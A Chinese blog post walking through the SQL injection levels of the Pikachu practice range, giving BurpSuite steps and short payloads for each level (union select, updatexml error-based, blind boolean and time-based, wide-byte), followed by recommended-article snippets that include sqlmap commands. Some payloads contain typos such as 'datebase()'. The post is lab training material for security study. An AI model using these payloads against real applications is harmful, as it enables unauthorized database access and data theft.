pikachu-sql注入(皮卡丘)

最新推荐文章于 2024-07-05 07:00:00 发布
最新推荐文章于 2024-07-05 07:00:00 发布
阅读量2k 收藏 6
点赞数 1
分类专栏: Web渗透 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jaasenyi/article/details/107778201
版权

数字型注入(post)

post注入方式,可用BurpSuite进行抓包,发送到Repeater模块进行id值的修改 
数字型注入 则不需要添加字符
payload: or 1=1

在这里插入图片描述

字符型注入(get)

字符型注入 当输入1'时 有报错信息''1'''可以看到源name值由单引号''包裹
可以用 '进行闭合 并用#注释掉后边内容

在这里插入图片描述

payload:  1' or 1=1 #

在这里插入图片描述

搜索型注入

根据提示 我们可以输入用户名一部分进行查询 并添加字符'如下图 并显示报错

在这里插入图片描述
在这里插入图片描述

由报错信息可以看到需要加%'进行闭合  用#注释掉后边内容
payload: vi%' or 1=1 #

在这里插入图片描述

爆库 payload: vi’ union select 1,database(),3 #
在这里插入图片描述

xxx型注入

经过调试该处用')进行闭合   #注释掉后边内容
payload:vi') or 1=1 #

在这里插入图片描述

"insert/update"注入

insert

点击注册 输入用户名密码 在注册处用BurpSuite进行抓包,发送到Repeater模块

在这里插入图片描述
在这里插入图片描述

利用concat执行sql注入语句
使用updatexml报错信息将sql语句执行结果返回
payload: 'or updatexml(1,concat(0x7e,database(),0x7e),0) or'

在这里插入图片描述

update

使用普通账号登录 点击修改信息在修改信息处使用BurpSuite进行抓包(修改信息建议不要有空)

在这里插入图片描述
在这里插入图片描述

payload: 'or updatexml(1,concat(0x7e,database(),0x7e),0) or'

在这里插入图片描述

"delete"注入

先进行随意留言 在删除留言时使用BurpSuite进行抓包

在这里插入图片描述

payload: 68 or updatexml (1,concat(0x7e,datebase()),0)
且在BurpSuite中Ctrl+U 对payload进行url编码

在这里插入图片描述

"http header"注入

使用admin/123456登陆以后刷新用BurpSuite抓包
在user-agent后加入payload

在这里插入图片描述

payload: 1' or updatexml (1,concat(0x7e,datebase()),0) or '

在这里插入图片描述

盲注(base on boolian)

只有输入 and 1=1时才有回显
payload:vince' and 1=1 #

在这里插入图片描述

盲注(base on time)

payload:  vince' and sleep(5)#

在这里插入图片描述

宽字节注入

因为是post注入方式需要用BurpSuite进行抓包
payload:vince%df’ or 1=1#

宽字节注入是要满足两个条件
1、数据库连接时开启gbk编码
2、对特殊字符进行\转义
当遇到‘时  由于\会对'进行转义 \在url中为%5c  则%df' 成为 %df%5c'
%df%5c在gbk编码中为一个汉字 从而'从\转义中逃脱出来

在这里插入图片描述

Two-words
关注
专栏目录
皮卡丘--sql注入
renyizou的博客
06-21 601
概述: 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞: 1.对传进SQL语句里面的
2022.7.28皮卡丘靶场SQL注入作业
weixin_44503202的博客
07-29 730
sqlmap注入
pikachu-sql注入
Resets_的博客
04-01 589
pikachu sql数字型注入,字符型注入
11.SQL注入-盲注基于(base on boolian)
最新发布
愿听风成曲
07-05 288
输入kobe直接返回正确的信息,输入kobe’ and 1=1#也返回了正确的信息,证明and被后台执行了。根据payload语句执行成功,则可以判断出数据库第一个字符ascii=112,转换成字符为p。输入的内容是否正确,返回的信息比较少,只有两种返回结果:正确或者是用户名不存在。通过上面的图例子,我们可以利用左右都为真,则判断数据库名称的字符,多次进行测试。现在则继续测试第二个字符,我这里是多次测试得出来得结果105转换字符为:i。同样也可以进行爆出该数据库下的表名的字符,数字为104转成字符为h。
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4214
我们以数字型(使用sqlmap)和整数型(使用手工注入)举一个例子 数字型注入(POST) 我们使用了sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库:pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2736
pikachu靶场通关之sql注入
PIKACHU-SQL注入(1-5)
koala_king的博客
03-03 173
sql
皮卡丘靶场-sql注入详解
Mr_helloword的博客
07-31 1810
皮卡丘靶场-sql注入 数字型注入 这里为post传参,所以我们需要抓包 抓包后发现id,我们一般在后面输入 ’ " \来测试有无注入,发现有sql语句报错,而且没有数字1,这和题目提示的数字型注入一样 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200730155448929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNz
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
基于pikachu漏洞平台的 --SQL注入攻击学习与总结
Mr.hu
10-16 1666
SQL注入攻击 基础知识 常见注释符号(官方链接): mysql> SELECT 1+1; # 行内注释 mysql> SELECT 1+1; -- 行内注释 mysql> SELECT 1 /*行内注释 */ + 1; mysql> SELECT 1+ /* 多行注释 */ 1; mysql> SELECT * FROM table1 WHERE a=1 /*! AND b=2 */ 其中/*! */ 里面的语句会被MySQL识别并执行,但是会被其他系统
皮卡丘靶场 SQL注入(时间延时注入)
PurEandPure
05-06 124
3、从kail跑sqlmap,判断是否存在注入点。-tochnique=T 用延时注入去查。
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 2027
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
pikachu-数字型注入-(方法二)之BurpSute (pikachu数字型注入)
wjwqp的专栏
03-01 556
pikachu-数字型注入-(方法一)之sqlmap (pikachu数字型注入) 另附 pikachu-数字型注入-(方法二)之BurpSute (pikachu数字型注入) 今天猴子君要和大家探讨的是SQL注入部分的数字型的注入过程。 首先运行pikachu的测试环境,找到SQL-Inject章节的数字型注入(post)。 先进行第一次试探,查看一下运行的原理。发现这是一个基于...
Pikachu SQL注入之http头注入
SS_liang的博客
01-12 577
这个界面给了两个提示,一个是UA头就是use agent另一个就是Accept头,这里我们就直接尝试在UA头进行测试:使用burp suite抓包:(这里有个插件比较方便,叫在火狐也可以安装)我这里只用bp给大家做示范,想用插件的可以去网上搜一下。这里OR是一个逻辑运算符,用于将两个或多个条件中的任何一个满足的情况下返回true,这里可以使用and但是后面使用报错注入的时候and就不合适了。
皮卡丘靶场的搭建以及SQL注入攻击(加强版)
qq_58012062的博客
11-29 1092
皮卡丘靶场的教程一点点分享
pikachu sql wp
m0_55185160的博客
06-20 151
SQL注入概述 SQL注入指的是通过将恶意SQL语句添加到应用的输入参数中,传递到后台被SQL服务器解析后执行的攻击。 基础知识 information_schema MYSQL更新到5.0后,默认在数据库中存放一个”information_schema“的数据库,记载了其他数据库的信息。 默认要记住三个表,SCHEMATA,TABLES,COLUMNS。 SCHEMATA:(记录了该用户创建的所有数据库名) ———————————————— 版权声明:本文为CSDN博主「kit_1」的原创文章,遵循C
pikachu SQL 注入(皮卡丘漏洞平台通关系列)
weixin_60508121的博客
04-14 3514
SQL注入漏洞的主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有严格的判断,导致其传入的数据拼接到SQL语句中后,被当做SQL语句执行。从而导致数据库受损。
Pikachu靶场 “Http Header”SQL注入
感谢关注
12-23 765
2. 设置payload1 :在。设置payload2 :在。
pikachu+SQL注入+Burp Suit
qq_54537919的博客
03-11 2435
pikachu+SQL注入+Burp Suit 2.1数字型注入(post) 2.2 字符型注入(get) 2.3 搜索型注入 2.4 XX型注入
pikachu通关sql注入
06-21
<< SQL注入是一种常见的网络安全漏洞,攻击者通过精心构造的SQL查询语句,试图欺骗应用程序或数据库管理系统执行非授权的操作。"Pikachu"并不是一个直接相关的术语,但如果我们假设你想了解如何使用SQL注入技术,通常这涉及到以下几个步骤: 1. **理解目标**:首先,你需要知道你要攻击的应用程序连接到哪个数据库以及它的查询结构。 2. **识别输入点**:Pikachu皮卡丘)通常是指游戏中的角色,但在安全语境下,可能指的是用户输入的地方,比如搜索框或表单字段。 3. **构造恶意查询**:利用`UNION`、`LIKE`、`OR`等关键词,结合用户输入,创建一条包含恶意SQL的查询。例如,如果你的目标是获取所有用户数据,可能会构造一个类似这样的查询: ```sql SELECT * FROM users WHERE username = 'pikachu' OR '1'='1'; -- 这里'pikachu'是用户输入,'1'='1'是永远为真的条件 ``` 4. **测试和调整**:尝试这个查询,如果成功,可能会返回不应公开的数据。如果不成功,可能需要调整输入或尝试其他类型的注入。 5. **防御措施**:避免SQL注入的关键在于对用户输入进行验证和转义,使用参数化查询或预编译语句,以及保持数据库软件的最新更新。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值